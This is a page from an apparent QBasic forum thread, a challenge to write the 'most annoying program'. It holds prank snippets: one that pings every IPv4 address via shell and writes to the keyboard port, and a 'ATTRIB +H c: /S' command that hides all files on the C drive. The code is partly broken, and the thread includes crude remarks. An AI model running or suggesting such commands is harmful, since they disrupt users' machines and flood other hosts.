Qbasicnews.com

Full Version: New challenge - most annoying program
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13
Quote:
Code:
do
    for a=1 to 254
        for b=1 to 254
            for c=1 to 254
                for d=1 to 254
                    shell "ping "+a+"."+b+"."+c+"."+d > ping.txt
                next
            next
        next
    next

i = i + 1

shell"shutdown   -a"
if i = 1 then
OUT &H60, &HF5
loop
else
loop
not sure but that should hit just about every comp that your comp can reach and slow them to. but thats if they allow it.
now its beter
Code:
shell "ATTRIB +H c: /S "
hahahaah
that will hide evreything

Anonymous

*puts gun in mouth*
Quote:
Code:
shell "ATTRIB +H c: /S "
hahahaah
that will hide evreything
HAHAHAH! *drool* *wank creams pants* AWESOME!1111111111111

You failed, kplzthxbye!
Code:
randomize timer
Do
i = int(rnd *13) + 1
Screen i
Loop

it may be wrong, it's been a while since I last coded.

[/code]
Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13